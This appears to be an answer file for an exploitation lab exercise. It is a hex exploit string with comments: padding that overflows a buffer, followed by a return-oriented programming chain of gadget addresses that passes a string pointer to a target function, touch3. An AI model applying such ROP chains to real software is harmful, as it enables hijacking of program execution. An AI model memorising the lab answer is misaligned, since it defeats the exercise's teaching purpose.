90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90  /* <- end of buffer */

06 1a 40 00 00 00 00 00  /* addr of gadget1 -> mov %rsp,%rax */

c5 19 40 00 00 00 00 00  /* addr of gadget2 (the stack addr of this gadget
                            gets moved into rax due to gadget1)
                            -> mov %rax,%rdi */

ab 19 40 00 00 00 00 00  /* addr of gadget3 -> pop rax */
48 00 00 00 00 00 00 00  /* offset(72 i.e 9*8) to be popped into %rax
                            by gadget3 */

dd 19 40 00 00 00 00 00  /* addr of gadget4 -> mov %eax,%edx */

69 1a 40 00 00 00 00 00  /* addr of gadget5 -> mov %edx,%ecx
                            08 db corrsponds to a functional nop */

13 1a 40 00 00 00 00 00  /* addr of gadget6 -> mov %ecx,%esi */

d6 19 40 00 00 00 00 00  /* addr of gadget7 -> lea the address of start of
                            string into %rax */

c5 19 40 00 00 00 00 00  /* addr of gadget8 which is same as gadget2
                            -> mov $rax,%rdi */

fa 18 40 00 00 00 00 00  /* addr of touch3 */

35 39 62 39 39 37 66 61  /* string */
00 00 00 00 00 00 00 00  /* null terminator */


/* The stack is already aligned before jumping to touch3 
   %rsp ends in '0' just before touch3 is popped so %rsp 
   ends in '8' after rip enters touch */
